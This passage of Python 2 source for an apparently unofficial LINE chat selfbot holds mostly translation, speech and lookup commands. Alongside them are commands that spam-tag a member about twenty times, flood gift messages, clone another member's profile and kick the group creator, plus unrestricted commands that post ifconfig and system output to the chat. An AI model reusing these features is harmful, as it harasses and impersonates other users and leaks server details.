elif "Translate-id " in msg.text: isi = msg.text.replace("Tr-id ","") translator = Translator() hasil = translator.translate(isi, dest='id') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-en " in msg.text: isi = msg.text.replace("Tr-en ","") translator = Translator() hasil = translator.translate(isi, dest='en') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ar" in msg.text: isi = msg.text.replace("Tr-ar ","") translator = Translator() hasil = translator.translate(isi, dest='ar') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-jp" in msg.text: isi = msg.text.replace("Tr-jp ","") translator = Translator() hasil = translator.translate(isi, dest='ja') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ko" in msg.text: isi = msg.text.replace("Tr-ko ","") translator = Translator() hasil = translator.translate(isi, dest='ko') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Id@en" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'en' kata = msg.text.replace("Id@en ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**") elif "En@id" in msg.text: bahasa_awal = 'en' bahasa_tujuan = 'id' kata = msg.text.replace("En@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**") elif "Jp@id" in msg.text: bahasa_awal = 'ja' bahasa_tujuan = 'id' kata = msg.text.replace("Jp@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@th" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'th' kata = msg.text.replace("Id@th ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----") elif "Th@id" in msg.text: bahasa_awal = 'th' bahasa_tujuan = 'id' kata = msg.text.replace("Th@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----") elif "Id@ar" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ar' kata = msg.text.replace("Id@ar ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----") elif "Ar@id" in msg.text: bahasa_awal = 'ar' bahasa_tujuan = 'id' kata = msg.text.replace("Ar@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@ko" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ko' kata = msg.text.replace("Id@ko ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----") elif "Ko@id" in msg.text: bahasa_awal = 'ko' bahasa_tujuan = 'id' kata = msg.text.replace("Ko@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif msg.text.lower() == 'welcome': ginfo = cl.getGroup(msg.to) cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name)) jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name)) cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName ) tts = gTTS(text=jawaban1, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Say-id " in msg.text: say = msg.text.replace("Say-id ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-en " in msg.text: say = msg.text.replace("Say-en ","") lang = 'en' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-jp " in msg.text: say = msg.text.replace("Say-jp ","") lang = 'ja' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ar " in msg.text: say = msg.text.replace("Say-ar ","") lang = 'ar' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ko " in msg.text: say = msg.text.replace("Say-ko ","") lang = 'ko' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Kapan " in msg.text: tanya = msg.text.replace("Kapan ","") jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Apakah " in msg.text: tanya = msg.text.replace("Apakah ","") jawab = ("Ya","Tidak","Mungkin","Bisa jadi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif 'Youtubemp4 ' in msg.text: try: textToSearch = (msg.text).replace('Youtubemp4 ', "").strip() query = urllib.quote(textToSearch) url = "https://www.youtube.com/results?search_query=" + query response = urllib2.urlopen(url) html = response.read() soup = BeautifulSoup(html, "html.parser") results = soup.find(attrs={'class': 'yt-uix-tile-link'}) ght = ('https://www.youtube.com' + results['href']) cl.sendVideoWithURL(msg.to, ght) except: cl.sendText(msg.to, "Could not find it") elif "ytsearch " in msg.text: query = msg.text.replace("ytsearch ","") with requests.session() as s: s.headers['user-agent'] = 'Mozilla/5.0' url = 'http://www.youtube.com/results' params = {'search_query': query} r = s.get(url, params=params) soup = BeautifulSoup(r.content, 'html5lib') hasil = "" for a in soup.select('.yt-lockup-title > a[title]'): if '&list=' not in a['href']: hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n')) cl.sendText(msg.to,hasil) print '[Command] Youtube Search' elif "Lirik " in msg.text: try: songname = msg.text.lower().replace("Lirik ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Wikipedia " in msg.text: try: wiki = msg.text.lower().replace("Wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=1) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Over Text Limit! Please Click link\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "ขอเพลง " in msg.text: try: songname = msg.text.lower().replace("ขอเพลง ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'This is Your Music\n' hasil += 'Judul : ' + song[0] hasil += '\nDurasi : ' + song[1] hasil += '\nLink Download : ' + song[4] cl.sendText(msg.to, hasil) cl.sendText(msg.to, "Please Wait for audio...") cl.sendAudioWithURL(msg.to, song[4]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif "รูป " in msg.text: search = msg.text.replace("รูป ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif "Profileig " in msg.text: try: instagram = msg.text.replace("Profileig ","") response = requests.get("https://www.instagram.com/"+instagram+"?__a=1") data = response.json() namaIG = str(data['user']['full_name']) bioIG = str(data['user']['biography']) mediaIG = str(data['user']['media']['count']) verifIG = str(data['user']['is_verified']) usernameIG = str(data['user']['username']) followerIG = str(data['user']['followed_by']['count']) profileIG = data['user']['profile_pic_url_hd'] privateIG = str(data['user']['is_private']) followIG = str(data['user']['follows']['count']) link = "LinkNya: " + "https://www.instagram.com/" + instagram text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollowerNya : "+followerIG+"\nFollowingNya : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link cl.sendText(msg.to, str(text)) except Exception as e: cl.sendText(msg.to, str(e)) elif "Checkdate " in msg.text: tanggal = msg.text.replace("Checkdate ","") r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal) data=r.text data=json.loads(data) lahir = data["data"]["lahir"] usia = data["data"]["usia"] ultah = data["data"]["ultah"] zodiak = data["data"]["zodiak"] cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============") elif msg.text in ["ปฏิทิน","Time","Waktu"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" cl.sendText(msg.to, rst) #==============================================================================# elif msg.text.lower() == 'ifconfig': botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===") elif msg.text.lower() == 'system': botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===") elif msg.text.lower() == 'kernel': botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===") elif msg.text.lower() == 'cpu': botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===") elif "Restart" in msg.text: print "[Command]Restart" try: cl.sendText(msg.to,"Restarting...") cl.sendText(msg.to,"Restart Success") restart_program() except: cl.sendText(msg.to,"Please wait") restart_program() pass elif "Turn off" in msg.text: try: import sys sys.exit() except: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot has been active "+waktu(eltime) cl.sendText(msg.to,van) #================================ STARTED ==============================================# elif "google " in msg.text: a = msg.text.replace("google ","") b = urllib.quote(a) cl.sendText(msg.to,"โปรดรอสักครู่...") cl.sendText(msg.to, "https://www.google.com/" + b) cl.sendText(msg.to,"Ketemu om ^") elif cms(msg.text,["/creator","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "u46a050ebcc66a90b47fae6256547cc53"} cl.sendMessage(msg) elif "Clone " in msg.text: copy0 = msg.text.replace("Clone ","") copy1 = copy0.lstrip() copy2 = copy1.replace("@","") copy3 = copy2.rstrip() _name = copy3 group = cl.getGroup(msg.to) for contact in group.members: cname = cl.getContact(contact.mid).displayName if cname == _name: cl.CloneContactProfile(contact.mid) cl.sendText(msg.to, "เลียนแบบสำเร็จ") else: pass elif "friendpp: " in msg.text: if msg.from_ in admin: suf = msg.text.replace('friendpp: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == suf: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Checkmid: " in msg.text: saya = msg.text.replace("Checkmid: ","") msg.contentType = 13 msg.contentMetadata = {"mid":saya} cl.sendMessage(msg) contact = cl.getContact(saya) cu = cl.channel.getCover(saya) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "Checkid: " in msg.text: saya = msg.text.replace("Checkid: ","") gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).id group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif msg.text in ["เพื่อน"]: contactlist = cl.getAllContactIds() kontak = cl.getContacts(contactlist) num=1 msgs="═════════List Friend═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Memlist"]: kontak = cl.getGroup(msg.to) group = kontak.members num=1 msgs="═════════List Member═════════-" for ids in group: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group) cl.sendText(msg.to, msgs) elif "Friendinfo: " in msg.text: saya = msg.text.replace('Friendinfo: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName contact = cl.getContact(i) cu = cl.channel.getCover(i) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus if h == saya: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) elif "Friendpict: " in msg.text: saya = msg.text.replace('Friendpict: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif msg.text in ["Friendlistmid"]: gruplist = cl.getAllContactIds() kontak = cl.getContacts(gruplist) num=1 msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.mid) num=(num+1) msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Blocklist"]: blockedlist = cl.getBlockedContactIds() kontak = cl.getContacts(blockedlist) num=1 msgs="═════════List Blocked═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplist"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List Grup═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.name) num=(num+1) msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplistmid"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List GrupMid═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.id) num=(num+1) msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif "Grupimage: " in msg.text: saya = msg.text.replace('Grupimage: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name gna = cl.getGroup(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Grupname" in msg.text: saya = msg.text.replace('Grupname','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name) elif "Grupid" in msg.text: saya = msg.text.replace('Grupid','') gid = cl.getGroup(msg.to) cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id) elif "Grupinfo: " in msg.text: saya = msg.text.replace('Grupinfo: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) print "Spamtag Berhasil." elif "รันคท @" in msg.text: _name = msg.text.replace("รันคท @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: msg.contentType = 13 msg.contentMetadata = {'mid': "u46a050ebcc66a90b47fae6256547cc53',"} cl.sendText(g.mid,"Spam") cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendText(msg.to, "Done") print " Spammed !" elif "playstore " in msg.text.lower(): tob = msg.text.lower().replace("playstore ","") cl.sendText(msg.to,"Sedang Mencari om...") cl.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob) cl.sendText(msg.to,"Ketemu om ^") elif 'wikipedia ' in msg.text.lower(): try: wiki = msg.text.lower().replace("wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=3) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Teks nya kepanjangan! ketik link dibawah aja\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "say " in msg.text.lower(): say = msg.text.lower().replace("say ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif msg.text in ["spam gift 25"]: msg.contentType = 9 msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4', 'PRDTYPE': 'THEME', 'MSGTPL': '8'} msg.text = None cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) elif msg.text in ["Gcreator:inv"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.inviteIntoGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif msg.text in ["Gcreator:kick"]: if msg.from_ in admin: ginfo = cl.getGroup(msg.to) gCreator = ginfo.creator.mid try: cl.findAndAddContactsByMid(gCreator) cl.kickoutFromGroup(msg.to,[gCreator]) print "success inv gCreator" except: pass elif 'lirik ' in msg.text.lower(): try: songname = msg.text.lower().replace('lirik ','') params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Getcover @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except: pass print "[Command]dp executed" elif "idline: " in msg.text: msgg = msg.text.replace('idline: ','') conn = cl.findContactsByUserid(msgg) if True: msg.contentType = 13 msg.contentMetadata = {'mid': conn.mid} cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg) cl.sendMessage(msg) elif "ดึงกลับ" in msg.text.split(): if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: try: grCans = [contact.mid for contact in group.invitee] cl.findAndAddContactByMid(msg.to, grCans) cl.cancelGroupInvitation(msg.to, grCans) cl.inviteIntoGroup(msg.to, grCans) except Exception as error: print error else: if wait["lang"] == "JP": cl.sendText(msg.to,"No Invited") else: cl.sendText(msg.to,"Error") else: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot sudah berjalan selama "+waktu(eltime) cl.sendText(msg.to,van) elif msg.text in ["Restart"]: cl.sendText(msg.to, "Bot has been restarted") restart_program() print "@Restart" elif msg.text in ["time"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" client.sendText(msg.to, rst) elif "image " in msg.text: search = msg.text.replace("image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif 'instagram ' in msg.text.lower(): try: instagram = msg.text.lower().replace("instagram ","") html = requests.get('https://www.instagram.com/' + instagram + '/?') soup = BeautifulSoup(html.text, 'html5lib') data = soup.find_all('meta', attrs={'property':'og:description'}) text = data[0].get('content').split() data1 = soup.find_all('meta', attrs={'property':'og:image'}) text1 = data1[0].get('content').split() user = "Name: " + text[-2] + "\n" user1 = "Username: " + text[-1] + "\n" followers = "Followers: " + text[0] + "\n" following = "Following: " + text[2] + "\n" post = "Post: " + text[4] + "\n" link = "Link: " + "https://www.instagram.com/" + instagram detail = 